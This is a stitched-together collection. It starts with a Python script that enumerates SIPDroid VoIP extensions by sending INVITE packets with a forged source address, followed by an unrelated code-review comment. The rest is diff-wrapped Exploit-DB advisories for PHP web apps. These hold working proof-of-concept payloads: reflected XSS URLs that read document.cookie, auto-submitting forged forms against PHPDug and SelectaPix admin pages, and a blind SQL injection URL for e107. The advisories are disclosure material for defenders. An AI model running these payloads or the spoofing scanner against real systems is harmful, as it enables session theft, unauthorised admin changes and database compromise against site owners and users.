SIPDroid-Extension_Enum.py
#
# This software is based on some functions of sipvicious-0.2.6.
#
# This code is only for security researches/teaching purposes,use at
your own risk!
#
import sys
import random
import re
from optparse import OptionParser
from socket import *
from myhelper import *
parse = OptionParser()
parse.add_option("-i", "--ip", dest="ip", help="Target IP range (CIDR or
unique IP). (MANDATORY)")
parse.add_option("-s", "--source", dest="source", help="Source IP
number. (MANDATORY)")
parse.add_option("-f", "--srcfake", dest="srcfake", help="Source IP
number (fake).")
parse.add_option("-p", "--dstport", dest="dstport", default=5060,
help="Destine port number (MAMDATORY due to SIPDroid Random port).
(default 5060)")
parse.add_option("-e", "--extension", dest="exten", default=None,
help="Destine extension. (default None)")
parse.add_option("-t", "--tag", dest="tag", default=None, help="Call
TAG. (default random)")
parse.add_option("-v", "--verbose", action="store_true", dest="debug",
default="False", help="Verbose mode - print pakets sent and received.
(default False)")
(options, arg) = parse.parse_args()
if not options.exten:
extension = "SIPDROID"
else:
extension = options.exten
if not options.srcfake:
srcfake = '1.1.1.1'
else:
srcfake = options.srcfake
dstport = int(options.dstport)
if not options.ip or not options.source:
print printmsg("Sintaxe erro. Try %s --help" % sys.argv[0], "WARNING")
sys.exit(1)
else:
dsthost = options.ip
fromhost = options.source
if options.tag is None:
tag = random.getrandbits(22)
else:
tag = options.tag
buf = 1024
addr = (dsthost,dstport)
cid='%s' % str(random.getrandbits(32))
branch=None
srcaddr = (fromhost,5062)
# Create socket
UDPSock = socket(AF_INET,SOCK_DGRAM)
# Binding on 5060
UDPSock.bind(srcaddr)
# Send messages
method = "INVITE"
(header,branch) =
makeRequest(method,extension,dsthost,dsthost,dstport,cid,srcfake,branch,tag)
if(UDPSock.sendto(header, addr)):
sent = True
if options.debug is True:
print printmsg("Data Sent:", "WARNING")
print header
print printmsg("INVITE sent to %s!\n" % dsthost, "Green")
else:
sent = False
# Receive messages
while sent:
try:
UDPSock.settimeout(4)
data,bindaddr = UDPSock.recvfrom(buf)
if options.debug is True:
print printmsg("Data Received:", "WARNING")
print data
if re.search('SIP/2.0 180 Ringing', data):
packet = data.split('\n')
for packetline in packet:
for origin in re.finditer('o\=[a-zA-Z0-9\-]+\@[a-zA-Z0-9.\-]+', packetline):
print printmsg("o=<extension>@<server>: %s\n" % origin.group(0), "Blue")
method = 'CANCEL'
(header, branch) =
makeRequest(method,extension,dsthost,dsthost,dstport,cid,srcfake,branch,tag)
if options.debug is True:
print printmsg("Data Sent:", "WARNING")
print header
UDPSock.sendto(header, addr)
sent = False
except Exception as excpt:
print excpt
print printmsg("OPS... Timeout on receving data or something wrong with
socket... take a look at dest. port number too (-p option).", "WARNING")
sent = False
# Close socket
UDPSock.close()
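Review bot: `printmsg` compares `color` against string literals with `is` (`if color is "Blue":` and the two `elif` branches), which tests object identity rather than equality and only happens to work because CPython interns short literals; the idiomatic form is `if color == "Blue":`, and the function should end with an explicit `return msg` so an unknown colour does not silently yield `None` that the callers then print. The `-v` option is declared with `default="False"`, a string rather than the boolean, so when the flag is absent `options.debug` holds the text `"False"` and the `options.debug is True` checks pass only because `store_true` stores a real `True`; `default=False` with `if options.debug:` states the intent directly. `makeRequest` also assigns `headers['Max-Forwards'] = 70` twice, and the second assignment can be dropped. The file concatenates two scripts (the helper module and the main script) separated by a `----[SIPDroid-Extension_Enum.py]----` banner, which will not parse as a single Python file; a header comment stating that the two parts must be saved as separate files (the first as `myhelper.py`) would save readers a confusing failure.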


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47682/info
Web Auction is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Web Auction 0.3.6 is vulnerable; other versions may also be affected.
http://www.example.com/webauction-0.3.6/dataface/lib/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(0)//


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/47697/info
E2 Photo Gallery is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/uploader/index.php/[xss]

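--- a/platforms/php/webapps/35700.txt
+++ b/platforms/php/webapps/35700.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/47698/info
+YaPIG is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+YaPIG 0.95 is vulnerable; other versions may also be affected.
+http://www.example.com/template/default/add_comment_form.php?I_ADD_COMMENT=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/template/default/admin_task_bar.php?I_ADMIN_TASKS=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/template/default/delete_gallery_form.php?I_SELECT_OPT=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/template/default/face_begin.php?I_TITLE=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/slideshow.php?interval=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E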
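--- a/platforms/php/webapps/35701.txt
+++ b/platforms/php/webapps/35701.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/47701/info
+SelectaPix is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+SelectaPix 1.4.1 is vulnerable; other versions may also be affected.
+<form action="http://www.example.com/admin/upload.php?albumID=1&parentID=0&request=single" method="post" name="main" id="main">
+<input type="hidden" name="uploadername" value=&#039;"><script>alert(document.cookie);</script>&#039;>
+<input type="submit" value="OK">
+</form>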
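--- a/platforms/php/webapps/35702.txt
+++ b/platforms/php/webapps/35702.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/47702/info
+Multiple GoT.MY products are prone to a cross-site scripting vulnerability.
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials; other attacks are possible.
+The following are vulnerable:
+Classified ADs 2.9.1
+Classmates 1.1.1
+Deal Informer 4.8.0
+http://www.example.com/themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3E
+alert%28document.cookie%29;%3C/script%3E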

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47726/info
WP Ajax Calendar is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
WP Ajax Calendar 1.0 is vulnerability; other versions may also be affected.
http://www.example.com/example.php?y=[xss]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47727/info
PHP Directory Listing is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP Directory Listing script 3.1 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php/[xss]

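--- a/platforms/php/webapps/35708.txt
+++ b/platforms/php/webapps/35708.txt
@@ -0,0 +1,49 @@
+source: http://www.securityfocus.com/bid/47733/info
+PHPDug is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+PHPDug 2.0.0 is vulnerable; other versions may also be affected.
+1.
+<form action="http://www.example.com/add_story.php" method="post" name="main">
+<input type="hidden" name="story_url" value=&#039;http://www.example.com/"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="Submit" value="Continue">
+</form>
+<script>
+document.main.submit();
+</script>
+2.
+<form action="http://www.example.com/editprofile.php" method="post" name="main">
+<input type="hidden" name="email" value=&#039;email@example.com"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="commentst" value="-4">
+<input type="hidden" name="Submit" value="Save Changes">
+</form>
+<script>
+document.main.submit();
+</script>
+3.
+<form action="http://www.example.com/adm/content_add.php" method="post" name="main">
+<input type="hidden" name="id" value="999">
+<input type="hidden" name="title" value=&#039;page"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="contentvalue="content">
+<input type="hidden" name="Submit" value="Submit">
+</form>
+<script>
+document.main.submit();
+</script>
+4.
+<form action="http://www.example.com/adm/admin_edit.php" method="post" name="main">
+<input type="hidden" name="id[1]" value="1">
+<input type="hidden" name="username[1]" value=&#039;admin<script>alert("XSS")</script>&#039;>
+<input type="hidden" name="password[1]" value="">
+<input type="hidden" name="Submit" value="Submit">
+</form>
+<script>
+document.main.submit();
+</script>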

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47750/info
e107 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
e107 0.7.25 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/news.php?extend.9999999%0aAND%0aSUBSTRING(@@version,1,1)=5